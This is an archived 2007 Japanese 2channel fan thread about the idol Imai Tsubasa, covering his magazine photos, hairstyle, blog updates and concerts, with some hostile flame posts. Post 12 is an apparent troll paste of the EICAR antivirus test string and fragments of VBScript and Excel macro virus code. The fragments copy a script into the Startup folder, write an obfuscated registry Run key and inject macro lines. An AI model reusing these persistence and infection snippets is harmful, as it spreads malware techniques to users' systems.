2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

(…`д´)つ復刻版59

1 :(…`д´)麺屋つ :2007/01/14(日) 21:01:39 ID:imwawNi7
こちらはつ本スレです
つ担なら  *何を言われてもすぐカッとしないでスルーする
          *他タレの悪口を言わない
          *過去ログ参照をウザがらない
          *回らなくてもしょうがない
そんな気持ちでマターリしようσ(…`д´)σネ!

過去ログ
http://tsulog-web.hp.infoseek.co.jp/
前スレ
http://tv8.2ch.net/test/read.cgi/jan/1163507825/

祝3周年!
文化放送(1134) 木曜24:00「翼のto base」放送中!

2 :ななしじゃにー:2007/01/14(日) 21:17:21 ID:aCA4SUUB
>1
乙&d!


3 :ななしじゃにー:2007/01/14(日) 21:20:05 ID:50kEStWT
>1
ありがd!

4 :高速土下座じじぃ:2007/01/14(日) 21:21:36 ID:wD620X3i
ずどどどどどどddん

5 :ななしじゃにー:2007/01/14(日) 21:31:27 ID:P5SW/GaL
>1
乙&三楠!

6 :ななしじゃにー:2007/01/14(日) 21:42:51 ID:zg3SuTVU
>1
d!

7 :ななしじゃにー:2007/01/14(日) 22:11:24 ID:7zDPgOrF
m9(゜∀゜)どーん

8 :ななしじゃにー:2007/01/14(日) 23:07:54 ID:C2EAcJnU
麺屋つの8人目のお客になった気分w

9 :ななしじゃにー:2007/01/14(日) 23:17:03 ID:zg3SuTVU
>8
しまったー

>(…`д´)
味噌バターラーメソひとつね〜w

10 :ななしじゃにー:2007/01/15(月) 00:13:48 ID:OAHnY6sv
明日の2時で閉鎖だってよ!ウエッウエッwww

11 :ななしじゃにー:2007/01/15(月) 19:00:35 ID:O9aF09r5
閉鎖にならなかったんだね(´∀`)

12 :ななしじゃにー:2007/01/15(月) 19:17:05 ID:Iij2gbqG
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


13 :ななしじゃにー:2007/01/15(月) 20:28:09 ID:KHRjN87D
閉鎖してくれてもいいな

14 :ななしじゃにー:2007/01/15(月) 20:33:58 ID:OAHnY6sv
閉鎖は8日後らしいよ

15 :ななしじゃにー:2007/01/15(月) 20:48:30 ID:hQpwYgRJ
姐サン方とタノシク話せたのにノォ
サビシス

16 :ななしじゃにー:2007/01/15(月) 20:52:57 ID:KHRjN87D
最近はミクシに行ってる人の方が多いんじゃん

17 :ななしじゃにー:2007/01/15(月) 21:08:53 ID:wSogHWNm
つスレも今までいろいろあったな
潮時な気もする

18 :ななしじゃにー:2007/01/15(月) 21:13:43 ID:bC1yqMCL
去るもとどまるも自由だよ
ただ去り際は美しくな

19 :ななしじゃにー:2007/01/15(月) 22:51:42 ID:GneeaacK
何かまた貼られたのかw
SONGSのつ、なかなかヨカタよ

20 :ななしじゃにー:2007/01/16(火) 11:22:29 ID:wA4CZK6v
あげとく

21 :ななしじゃにー:2007/01/16(火) 12:28:24 ID:pKu1Wg7A
トンsongs忘れてた!
潮時なのはつスレというか壷だよ

22 :ななしじゃにー:2007/01/16(火) 17:09:22 ID:Da9OV16k
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::..- −―::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::./      \..:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::./         .::::::::::::::::::::::::::::::.:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::....、        |.::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::ヽ         / ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.....\      ./..........       
         ..............................    .. ー −::::::::::::::::::::::::::::::::::::::..........................       
                            
   ∧_∧                         
   (:::   )  今までありがとう                   
   /   つ                        
::::○、__,.へ__)                    
 ""゛""''""""゛゛""''' "j'                     
 :::::ヘ :::::....ヽ :::;;;ノ  ::( 
 ::  ゝ  :::::......ノ:;;../ 

23 :ななしじゃにー:2007/01/16(火) 17:15:02 ID:jJiKi4KM
勝手に終わらすなw

24 :ななしじゃにー:2007/01/17(水) 00:15:29 ID:/dsf2FDh
不二家は?

25 :ななしじゃにー:2007/01/17(水) 09:36:36 ID:IDodDG3e
つがジュニア時代に銀座の不二家レストランで偶然会ったことがあるよw

つは家族で食事していて肉を食べた後にデカいパフェを食べていた

るんは風の中のころ

26 :ななしじゃにー:2007/01/17(水) 12:36:44 ID:eev8iIv/
るん時代のつを思い起こして想像…
つとパフェかばえすぎる

27 :ななしじゃにー:2007/01/17(水) 12:56:15 ID:ZGaiD8Gk
つって辛党とか甘いものは苦手とかいうわりにチョコ好きだったりココアにハマったり
基本的にカカオ中毒だよねw

28 :ななしじゃにー:2007/01/17(水) 14:49:13 ID:PPbidr47
いつかのミニステでも本番前チョコアイス食べたって言ってたよなw

29 :ななしじゃにー:2007/01/17(水) 15:58:27 ID:fjoEa5yG
BABBIも好きだしなw

30 :ななしじゃにー:2007/01/17(水) 16:39:08 ID:5ceGI2lC
ソロコン移動中にパーキングエリアでソフトクリーム食べたりしてたしね

31 :ななしじゃにー:2007/01/17(水) 19:58:25 ID:xrmmjPgl
家族でファミレスでパヘってカバ○すぎる

32 :ななしじゃにー:2007/01/17(水) 23:52:16 ID:XEVlTvGG
るんてことははパーマつの頃だな
ナツカシスw

33 :ななしじゃにー:2007/01/18(木) 00:40:09 ID:H9Y0yJfT
つ念願のフランス行ってるのか
良かったね

34 :ななしじゃにー:2007/01/18(木) 12:59:28 ID:GFAxsKGK
NKでコ○リハしてるがな
NKってフランスか?w

35 :ななしじゃにー:2007/01/18(木) 13:21:08 ID:Gr1Ds//1
あ〜あ相手しちゃったw

36 :ななしじゃにー:2007/01/18(木) 21:26:38 ID:u7S3Edeb
つはちょっとロン毛が似合うよね

37 :ななしじゃにー:2007/01/18(木) 21:30:18 ID:btlezFhs
>36
ノシ
発作魔ぐらいの短髪も似合うとオモ

38 :ななしじゃにー:2007/01/19(金) 00:32:37 ID:I9Mb79iI
つフランス行けて大チャンにも会えて
ゴールした試合も見てたとは
楽しかったみたいでヨカタ

39 :ななしじゃにー:2007/01/19(金) 01:08:40 ID:Sp5i1cdb
パリでキャンドル屋に行ったってのが
女子っぽいとオモタw

40 :ななしじゃにー:2007/01/19(金) 03:42:14 ID:CVYdruIF
遠征したサポーターの目撃で
つが海外でもドコモの携帯をピコピコしてたそうな


グローバルなヤシだなぁ

41 :ななしじゃにー:2007/01/19(金) 04:27:04 ID:DaH+ju+S
つの趣味ってたまに女っぽいな…

42 :ななしじゃにー:2007/01/19(金) 05:32:32 ID:i3BHwOX5
ハマの番長に返信してたなw

43 :ななしじゃにー:2007/01/19(金) 05:46:42 ID:G9epCs1Q
いい加減恥ずかしくないの?
ズニア担ナリしてもバレバレだからさっさと氏んでね
いつも居ついててテラウザス

307 名前:ユーも名無しネ[sage] 投稿日:2007/01/19(金) 03:48:18
この時間だから言わせてお
つの声と顔テラスチだお

310 名前:ユーも名無しネ[sage] 投稿日:2007/01/19(金) 03:48:49
つはたたかれてるとかばいたくなるお
btmやミキティと同じだお

44 :ななしじゃにー:2007/01/19(金) 05:57:53 ID:G9epCs1Q
向こうでわざと滝担ナリして浮いたレスしてるのもバレてるよ
そうまでしてズニア担に滝と滝担を叩かせたい理由は何?

45 :ななしじゃにー:2007/01/19(金) 07:16:16 ID:cCDHufe5
283でまた写真載せてくれ
どんなのでも待ち受けにするからw

46 :ななしじゃにー:2007/01/19(金) 07:49:59 ID:Rpj92VE0
ベルサイユの写真以外で頼むw

47 :ななしじゃにー:2007/01/19(金) 10:58:51 ID:R5bOXF3w
(…`д´)<こたつはいかがわしい!

48 :ななしじゃにー:2007/01/19(金) 14:15:16 ID:vs7KKtrM
海外でも日本の携帯を使えるように設定したら
2チャンも見れるし自分のブログも更新できるし便利な世の中になった
つも海外で使えるようにしたんだねぇ

49 :ななしじゃにー:2007/01/19(金) 14:24:48 ID:zLE+KOk5
(…`д´)<2ちゃん見たいからね

50 :ななしじゃにー:2007/01/19(金) 15:25:19 ID:R5bOXF3w
つは随分前から海外でも携帯使ってたとオモ

51 :ななしじゃにー:2007/01/19(金) 18:25:41 ID:UtMbLJoM
TM兄さんに海外からメールだか電話したりしてたよな

52 :ななしじゃにー:2007/01/19(金) 19:03:17 ID:Sp5i1cdb
>51
してたね
そういやレボ兄さんとハワイ行くって公約はどうなったんだw

53 :ななしじゃにー:2007/01/20(土) 01:45:52 ID:EafPqeMF
>52
そうそう、超楽しみにしてたのにPJ変わっちゃった
兼ヲタの自分はいつまで〜も待ちますので是非w

54 :ななしじゃにー:2007/01/20(土) 08:38:21 ID:S+KtguYZ
そもそも今もお付き合いしてるのかな?
レボ兄さんの話自体、つから聞かなくなってしまった様な

55 :ななしじゃにー:2007/01/20(土) 15:16:31 ID:3+jHPWwM
つは飽きっぽいからなww

56 :ななしじゃにー:2007/01/20(土) 15:43:50 ID:F52A34Wq
あとアントラーズの中田とかも昔はよく話に出てきたが今はサッパリw

あとは斗や亀か?

57 :ななしじゃにー:2007/01/20(土) 15:55:51 ID:REpCa3mv
そのうち大ちゃんも

58 :ななしじゃにー:2007/01/20(土) 16:01:16 ID:DUglKdPI
ぴあも良かったがオリスタのつもかなりイイゾ!

59 :ななしじゃにー:2007/01/20(土) 16:22:44 ID:L0ALUOog
オリスタ黒シャツで笑ってるつが隙(*´∀`)

60 :ななしじゃにー:2007/01/20(土) 16:33:26 ID:sP+nZAHu
レボと斗亀あたりはつきあいが全然違うんじゃないの

61 :ななしじゃにー:2007/01/20(土) 16:35:59 ID:cVd943Ry
つが話題にしないだけで
付き合いの有無はヲタにはわからない罠

>58
ビロードのつも載っててウマーだな

62 :ななしじゃにー:2007/01/20(土) 19:20:44 ID:EIs094lZ
(…`д´)復活!

63 :ななしじゃにー:2007/01/20(土) 20:53:52 ID:sP+nZAHu
>(…`д´)
そろそろ行進頼んます

64 :ななしじゃにー:2007/01/20(土) 22:06:05 ID:FZ4wA+TD
マシューもそういえばつの中から消えたな  

65 :ななしじゃにー:2007/01/20(土) 22:10:22 ID:5rf1N9rx
去年の今頃、サーフィンはじめたとか言ってなかったっけ?
もっと前だったかな

66 :ななしじゃにー:2007/01/20(土) 22:11:58 ID:BVXnVORB
芸能人の話はあまりしない方がいいよね

67 :ななしじゃにー:2007/01/20(土) 22:20:58 ID:sRR1cRBm
>65
どうしたんだ?急にw

68 :ななしじゃにー:2007/01/20(土) 22:38:44 ID:5rf1N9rx
>67
いや、その話もほんの1,2回雑誌か何かで目にしただけで
もうすっかり聞かなくなったし
やっぱり飽きっぽいんだなと思ってw

69 :ななしじゃにー:2007/01/20(土) 22:43:14 ID:BVXnVORB
つがレボの話しだしたのは知り合ってから5年後くらいの事だった
あまり言うの隙じゃないのかもね

70 :ななしじゃにー:2007/01/20(土) 23:08:00 ID:cVd943Ry
>69
そうだね

そういや最近のつは一体どんな髪型なんだろうね?

71 :ななしじゃにー:2007/01/20(土) 23:16:59 ID:CKyPQG17
>69

72 :ななしじゃにー:2007/01/20(土) 23:19:02 ID:CKyPQG17
>69
不言実行だからな

スマソミスた

73 :ななしじゃにー:2007/01/21(日) 01:01:31 ID:YRJgnwRx
>70
前髪もちょっと切ってクレ
短髪嫌がってた割に目ヂカラ無くなるとそれはそれでイヤソなヲタ心w

74 :ななしじゃにー:2007/01/21(日) 11:47:05 ID:753wDksF
禿同

75 :ななしじゃにー:2007/01/22(月) 03:00:56 ID:fFxQofwX
遅れてTVぴあ買いました。
ばんざいするつのウエストにパンツが…
私物だよねーと思うと、ちょっとドチドチしたw

76 :ななしじゃにー:2007/01/22(月) 09:58:14 ID:YW0gOtqI
ソロコン広島でも兄チャンカルバン○ラインだからって
小さい子に言ってたなw

77 :ななしじゃにー:2007/01/22(月) 11:00:45 ID:uyrX77iR
小さい子にまで自慢したくなるパンツなのかw

78 :ななしじゃにー:2007/01/22(月) 17:00:32 ID:Wgs+d9DT
どんな流れでぱんつ自慢になっちゃうのか…

79 :ななしじゃにー:2007/01/22(月) 19:58:19 ID:fFxQofwX
てか、つがCKのぱんつを洗って干して畳んで……っていうのが。
男アイドルなのにやってそうなのが、つらしいよな。

80 :ななしじゃにー:2007/01/22(月) 20:00:40 ID:zZJnUdfO
歩誌(・∀・)イイ!

81 :ななしじゃにー:2007/01/22(月) 20:02:13 ID:VQ5svQ0g
>>79
つか、普通誰でもやってるだろ

82 :ななしじゃにー:2007/01/22(月) 20:43:18 ID:q7qlwH/n
関係ないが下着までクリーニングに出してる女優の話を聞いた事がある

83 :ななしじゃにー:2007/01/22(月) 20:46:55 ID:ejAvIdgQ
つは女の自分より家事しっかりしてる
婿に来て欲しい

84 :ななしじゃにー:2007/01/22(月) 21:51:36 ID:3qRQ7yGR
でも姑か小姑並みに家事全般に口うるさそうだぞw

85 :ななしじゃにー:2007/01/22(月) 22:25:08 ID:KylTU7Ug
>77
唐突ではあったけど、自慢したわけではないよw

つの家事はこだわるポイントとどうでもいいポイントがありそうだ
トイレ掃除は甘いってことを以前レボ兄が暴露してた気がする


86 :ななしじゃにー:2007/01/22(月) 23:07:17 ID:SUiztYQp
もしかして見えるところはトコトンきれいにってタイプじゃ(w

87 :ななしじゃにー:2007/01/22(月) 23:17:51 ID:YW0gOtqI
>86
血液型でくくるのもなんたがA型にそういうタイプ多いよ
見えないとこは別にいい。そんなジヌンもA型だw

88 :ななしじゃにー:2007/01/22(月) 23:20:16 ID:HcfUC8Hz
(…`д´)<だってトイレつかわないもん

89 :ななしじゃにー:2007/01/23(火) 03:05:49 ID:soSlfgTI
あ、そうだったねw

90 :ななしじゃにー:2007/01/23(火) 04:31:04 ID:sbYAOsJj
>86
ゴミついてるよ
他板でナリやってると住み分け出来なくなるの?

91 :ななしじゃにー:2007/01/23(火) 05:26:51 ID:62suRObo
そのキャラまだ続行中だったのかw

92 :ななしじゃにー:2007/01/23(火) 06:50:32 ID:Nqs5sZ/N
トイレマットが足型に汚れてるんだったっけ?w

93 :ななしじゃにー:2007/01/23(火) 08:49:50 ID:moMIKcsQ
カウコン写真ヤバス

94 :ななしじゃにー:2007/01/23(火) 09:12:46 ID:vXmpi8Ks
>93
ちょっkwsk

95 :ななしじゃにー:2007/01/23(火) 15:14:46 ID:moMIKcsQ
いつも行くブログにでてたよ


96 :ななしじゃにー:2007/01/23(火) 21:33:06 ID:z7jzr6kz
イチオシ、つはうに丼食べたんだなw

97 :ななしじゃにー:2007/01/24(水) 05:33:18 ID:x643yFbf
この同人さっさと引き取ってほしいんだけど
34歳基地腐女子乙

641 名前:ユーも名無しネ[sage] 投稿日:2007/01/21(日) 18:54:35
じぬんだけの翼翔組が

339 名前:ユーも名無しネ[sage] 投稿日:2007/01/24(水) 03:21:07
翼と翔にします

98 :ななしじゃにー:2007/01/24(水) 13:19:04 ID:9kZJrtwl
ヲババの書き込みが早朝すぎてワロス

99 :ななしじゃにー:2007/01/24(水) 13:21:11 ID:8YSqZx4K
歩誌のつ少し痩せた?ビジュいいわぁ〜

100 :ななしじゃにー:2007/01/24(水) 16:59:48 ID:gDSqmlzY
カウコン写ミタヨ
トロッコから下を覗き込むつが禿ヤバス

101 :ななしじゃにー:2007/01/24(水) 18:43:38 ID:9qBauNI8
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【滝沢秀明】タッキー&翼 Vol.2【今井翼】 [同性愛サロン]
SHOCK2007 [演劇・舞台役者]
SHOCK2007 -2- [演劇・舞台役者]
天保異聞 妖奇士(あやかしあやし) 説二十 [アニメ]
ジャニーズドラマを語るスレ176 [テレビドラマ] ←ドラマ板に出張してんの?

102 :ななしじゃにー:2007/01/24(水) 19:48:36 ID:FfwG2AVV
>101
まぁオマイはとりあえず専ブラ入れて気に入らないの全部アボン登録したら無駄な苛々もおさまるかもよ?

103 :ななしじゃにー:2007/01/25(木) 01:39:24 ID:awH5S8vd
]

104 :ななしじゃにー:2007/01/25(木) 18:17:56 ID:HgLpsL3g
(…`д´)<今日ラジオ

105 :ななしじゃにー:2007/01/25(木) 18:42:02 ID:yjb2Ac23
>104
お知らせdw

106 :ななしじゃにー:2007/01/26(金) 02:01:12 ID:GfaV/KHd
大ちゃんとオソロなんて凄い仲いいね

107 :ななしじゃにー:2007/01/26(金) 12:07:42 ID:+rbCOA62
ttp://black-suki.magnet.ne.jp/blog/07/index.html

この人お姉さんの結婚で翼と親戚になったんだね〜。うらやま

108 :ななしじゃにー:2007/01/26(金) 12:11:11 ID:dZA+EZDY
>>107
このblogの本人が情報を回しだしても
すぐにバレるなぁ。
もっと常識を持った人が親戚になってほしいもんだ

109 :ななしじゃにー:2007/01/26(金) 13:53:48 ID:34VAKYYU
今日もズニア担ナリして自演乙
何で毎日居ついてるの?

460 名前:ユーも名無しネ[sage] 投稿日:2007/01/26(金) 12:21:47
1回でいいから自担つか座について欲しいお

480 名前:ユーも名無しネ[sage] 投稿日:2007/01/26(金) 12:24:11
>460
窓か魔に加入しないかぎりミリだお
じぬんもつについてバキバキ系踊ってほしいお。゚( ゚`A´゚ )゜。

110 :ななしじゃにー:2007/01/26(金) 13:56:26 ID:ruchzNnZ
はとこの嫁って言えば一言ですむのに

111 :ななしじゃにー:2007/01/26(金) 15:15:21 ID:iGitpok9
緑と目を合わせる人は半年ロムって出直してくれ

112 :ななしじゃにー:2007/01/26(金) 16:01:57 ID:+098lRrZ
カウントダウンで髪型かっこよかったけどもう変わっちゃったんですか?

113 :ななしじゃにー:2007/01/26(金) 17:22:10 ID:nYxloJH2
>109
いちいちこっちまで出張してくるな
そっちのスレで解決しろ

114 :ななしじゃにー:2007/01/26(金) 18:22:26 ID:GfaV/KHd
意味がさっぱり分からない自分はまともなんだな、きっと

115 :ななしじゃにー:2007/01/26(金) 18:36:21 ID:NbnRyZbr
華麗に放置しようよ
なんでいちいち反応するかな

116 :ななしじゃにー:2007/01/26(金) 20:59:20 ID:AhAoUEEE
いとこの娘さんがつ姉とケコーンって
ジヌンもさっぱり意味がわから茄子w

117 :ななしじゃにー:2007/01/26(金) 22:41:41 ID:dtVii6x7
はとこの嫁なんて一度も会ったことナス
ましてやその兄弟なんて顔も知らん

118 :ななしじゃにー:2007/01/26(金) 23:11:03 ID:AY24Y982
雑誌で今井翼がドンドコドンのぐっさんの相方に例えられてたwww
どっちも存在感ないってwww

119 :ななしじゃにー:2007/01/26(金) 23:39:29 ID:rxb93SzP
283更新して〜ヽ(`Д´)ノ

120 :ななしじゃにー:2007/01/27(土) 00:10:38 ID:wWGngjni
つ担歴半年の若輩者ですが、失礼します。
こんなに露出の少ないタレの担って、ホントに
忍耐いりますね〜・・・。
もちろん、大好きですけど、話題がなさすぎです。
存在感がないとか言われるけど、これだけ露出がない
と、人気の出ようがないと思います。
相方さんの使われ方といい、ホントにひどい・・・。
たきつが何をしたっていうのよ(怒)!!!
Jr時代事務所にものすごく貢献してきているはずですが★
若手3グループなんて私にとってはどうでもいいのですが、
そっちばかりプッシュしてるような気がします。
やっぱり世の中には本当に良いものを魅せていくべきですよね。
ビジュアル、ダンス、歌、性格、どれも満点なのに・・・。



121 :ななしじゃにー:2007/01/27(土) 00:17:25 ID:nRN15dlL
(…●д●)y━・~~

122 :ななしじゃにー:2007/01/27(土) 00:52:00 ID:Y/5nddGY
相方とつはもうプッシュされた跡だから…相方は派手に開花したけど、つは成果なかったんだから仕方ナス
後輩プッシュは順番…次も
100人が控えてる

123 :ななしじゃにー:2007/01/27(土) 02:45:44 ID:91O2Vk29
まとめてどっか逝け

124 :ななしじゃにー:2007/01/27(土) 04:57:49 ID:jykShiG3
>113
つ担があちこち出張してツレ叩いたりズニア担ナリするのは良くて
他担が自スレに来るのは許せないのか
どこまで自己厨なんですか?
心当たりがあるからキレてるんですよね

125 :ななしじゃにー:2007/01/27(土) 06:04:22 ID:6GZFB186
早朝からヲババ乙
どこ覘いてんのか知らないけど
墓穴掘ってるぞおまい

126 :ななしじゃにー:2007/01/27(土) 06:34:21 ID:7K+MeTX5
>121
クリ魂のとりこの時のつみたいw

127 :ななしじゃにー:2007/01/27(土) 09:59:30 ID:wWGngjni
これだけ露出ナスでも、最近まわりにつファン藁ワラ増えてきてるんだが。
デブ時のコザル&歌ヘタ&タリンコぶりではいくら押してもブレイクするわけ
ないと思われ。(スマン当時アンチ。姐さん方見る目アルヨ。)
最初から出来上がってた相方と違ってつは成長するキャラ
なんだから、今が押しどきだとオモ。
カコヨクなってから押してもらってる凸裏山。


128 :ななしじゃにー:2007/01/27(土) 10:16:42 ID:3+vL9lgC
121で悪いつウバージョンもあったよな。ナツカシスw


129 :ななしじゃにー:2007/01/27(土) 10:22:50 ID:3+S8yqA2
>127
もう手遅れだと思います

130 :ななしじゃにー:2007/01/27(土) 17:56:12 ID:9cwCZv9d
>127
まさしく自分新規です
ついでに影響されて周りもつ見始めたし、その友人も昔のつはあんまり…って言ってた
今が押し時かもしれないw

131 :ななしじゃにー:2007/01/27(土) 19:15:22 ID:baFG0JGP
短髪にした方がイパーンには受けがいい気がする

と短髪派な自分は言ってみるw

132 :ななしじゃにー:2007/01/27(土) 20:03:27 ID:ILJKmIPm
>131
短髪か長髪かの論争は不毛。
自分はオタになった途端髪切られorzになったし、自分の周りも短髪NGな人ばかり。
短髪か長髪かは、本当に個人の好みによるから意味茄子。

133 :ななしじゃにー:2007/01/27(土) 20:20:37 ID:3+vL9lgC
>132
言ってることは間違ってないんだけど暑苦しい
モチツケ


134 :ななしじゃにー:2007/01/27(土) 20:21:15 ID:F1+DM91s
長くても短くても良いからワイルドチックな髪型がイイナー
つの顔立ちが生きてくるとオモ

135 :ななしじゃにー:2007/01/27(土) 21:47:23 ID:7K+MeTX5
>133がモチツケと言いたい気持ちもわかるが、>132の気持ちもわかる
どっちが好きなんて個人の好みなんだから一々イパーンはとか言う方が暑苦しい

136 :ななしじゃにー:2007/01/27(土) 21:49:01 ID:7K+MeTX5
ジヌン>126姐さんとは別人なんだけど、初めて同じスレで同じIDでたw

137 :ななしじゃにー:2007/01/27(土) 22:49:42 ID:cTwNa7Km
でも切り立てホヤホヤの短髪はキツかったよw
コンサートのOPで笑いが起こったからね

138 :ななしじゃにー:2007/01/27(土) 22:56:06 ID:LgjSsd3s
笑いというより、どよめきねw

139 :ななしじゃにー:2007/01/28(日) 00:28:45 ID:Rbs2siFn
むしろその前に奥にでてた写真晒されてるの見て自分ちょっと泣いたw

140 :ななしじゃにー:2007/01/28(日) 00:40:56 ID:3YdNyJpR
おい!
更新してるジャマイカ!

141 :ななしじゃにー:2007/01/28(日) 00:44:39 ID:B0RDOHJy
ホントだ!w
何故か泣けてきた。

142 :ななしじゃにー:2007/01/28(日) 00:45:12 ID:GHgLKl9e
つ更新d!
旅の報告だけかと思いきや
途中から長いわ重いわw

143 :ななしじゃにー:2007/01/28(日) 00:45:19 ID:5Cqx4GBr
ほんとだw

何時の間に長崎?

144 :ななしじゃにー:2007/01/28(日) 00:50:59 ID:UKkNs76V
更新d
全部の地域まわってるんだろうか
>142
確かに重いw

145 :ななしじゃにー:2007/01/28(日) 00:54:41 ID:p3hWAOD2
珍しく改行してるね
ポエマーの気持ちなんだろうかw

146 :ななしじゃにー:2007/01/28(日) 00:55:47 ID:gdFt216E
なんか今年もソロコン絶対ある気がしてきたw

147 :ななしじゃにー:2007/01/28(日) 00:56:04 ID:If1GH6y+
ホントだ、つ乙!
でもあの映画は自分にはイマイチw
写真待ってるゾ

148 :ななしじゃにー:2007/01/28(日) 01:08:07 ID:lcdD9H3i
明日平和公園に行ってきます(*´∀`)ノシ
いつ来たんだつ…orz

149 :ななしじゃにー:2007/01/28(日) 01:22:47 ID:2IB/q1oN
ほんとだ!つ行進dd
期待してるぞい

150 :ななしじゃにー:2007/01/28(日) 01:39:43 ID:5vfked14
ほ、本当に更新されてる!トンです☆
ああ今まで長かった。泣。
一人旅良かったみたいですね。
しかし相変わらずの殺人的生真面目さw

151 :ななしじゃにー:2007/01/28(日) 06:03:14 ID:m3WsXmcH
>125
オマイずっと浮いてるよ
墓穴掘ってるのは自分だって気付こうね
あちこち監視してるのバレバレだよ
気付いてるからしつこく食い付いてくるんだろうしねw

152 :ななしじゃにー:2007/01/28(日) 06:09:46 ID:m3WsXmcH
ここが上がると滝スレがすぐ上がるからわかりやすい

153 :ななしじゃにー:2007/01/28(日) 09:57:23 ID:Gh6W0OXf
>146
だよね、自分も思った
お金貯めておかなくちゃ

154 :ななしじゃにー:2007/01/28(日) 12:21:45 ID:eMUcbCd4
毎年魂ばっかりでもう金が限界だよ
頼むからTVにでてくれ

155 :ななしじゃにー:2007/01/28(日) 12:34:04 ID:cSDWJ+3N
両方が一番良いがw
金がかかっても魂が観たい

156 :ななしじゃにー:2007/01/28(日) 12:53:16 ID:mMBEKy7M
魂はツアじゃ無くてもいいから続けて欲しい
やっぱり生が一番だよ

157 :ななしじゃにー:2007/01/28(日) 12:57:23 ID:oK+stMng
もう解散してソロオンリーでいいのにね

158 :ななしじゃにー:2007/01/28(日) 12:58:53 ID:mMBEKy7M
>157
別に?
生で見れる機会が増えるならソロもユニも大事ですが何か?

159 :ななしじゃにー:2007/01/28(日) 13:01:10 ID:gdFt216E
TVはカメラアングル次第で神にも悪夢にもなるが
魂はジヌンの目でドコを追うも自由自在だからなw

160 :ななしじゃにー:2007/01/28(日) 13:03:59 ID:cSDWJ+3N
ユニ曲もソロ曲も好きだし
いろんなつが観られてウマーだから
自分もソロ、ユニどちらも有りが良いな

161 :ななしじゃにー:2007/01/28(日) 14:00:03 ID:n2yZNWF9
>>127
タリンコって何?頭の足りない子?

162 :ななしじゃにー:2007/01/28(日) 14:52:34 ID:tTOPNCie
>127さんじゃないけど

頭の足りん子、で合ってると思う

ちゃんと表記すると結構ひどいがw
タリンコて書くとなんとなく可愛いな…

163 :ななしじゃにー:2007/01/28(日) 15:36:59 ID:4Yle2VGw
キャップにラグランTって、つらしいな(´ω`)

164 :ななしじゃにー:2007/01/28(日) 15:45:53 ID:NhaxPNHS
ユニコンよりソロコン早くみたい

165 :ななしじゃにー:2007/01/28(日) 16:03:41 ID:N6LKF/Tu
>154
禿同
TVでつを見たい
つの事を考えてもやっぱりTV活動が主体じゃないと
それにヲタしか見ないなんて勿体ないとオモ

166 :ななしじゃにー:2007/01/28(日) 16:12:55 ID:oK+stMng
勿体ないと思うのはヲタだけ。もうプッシュはないよ

167 :ななしじゃにー:2007/01/28(日) 16:30:55 ID:n2yZNWF9
>>162
そうなんだ、d。
まさか合っていたとはw

168 :ななしじゃにー:2007/01/28(日) 16:39:44 ID:n2yZNWF9
いやでも男らしくなったね
昔はコンでのメンバー紹介、
体が薄くフラフラして声も裏返ってハラハラした。
それでも好きだったけど


169 :ななしじゃにー:2007/01/28(日) 16:59:04 ID:r+YCG9ME
>165
同意
それで共演者がソロ魂にも足を運んでくれたらいいとオモ

170 :ななしじゃにー:2007/01/28(日) 17:14:06 ID:oK+stMng
共演者が来て何がうれしいの?

171 :ななしじゃにー:2007/01/28(日) 17:43:47 ID:B7JsVXB1
ID:oK+stMng
つスレがよっぽどスチなんだね
(`Д´)ヽ(´∀`)ヨチヨチ

172 :ななしじゃにー:2007/01/28(日) 20:05:38 ID:S+VV1C5X
なんでテレビに出れないんだろうね

173 :ななしじゃにー:2007/01/28(日) 20:17:59 ID:p4uWF37c
ラグランTにキャップにリストバンドと
コーディネイトがもうできた(´∀`*)

174 :ななしじゃにー:2007/01/28(日) 20:41:40 ID:8akz5EjT
あんなに長い文章だと今日の更新はないかな
アイリッシュダンスって姿勢によさそうw

175 :ななしじゃにー:2007/01/28(日) 21:01:49 ID:w8Gr+7bP
 ||     |    |
 ||o    .|    |
 ||     |    |
   ̄ ̄ ̄ ̄ ̄ ̄
  ガラッ!!
  ______
 |.∧ ∧ .||  .|  |  / ̄ ̄ ̄ ̄ ̄ ̄
 |(´・ω・)||o |  | <  もう寝ますね
 |/  つ.||  .|  |  \______
   ̄ ̄ ̄ ̄ ̄ ̄

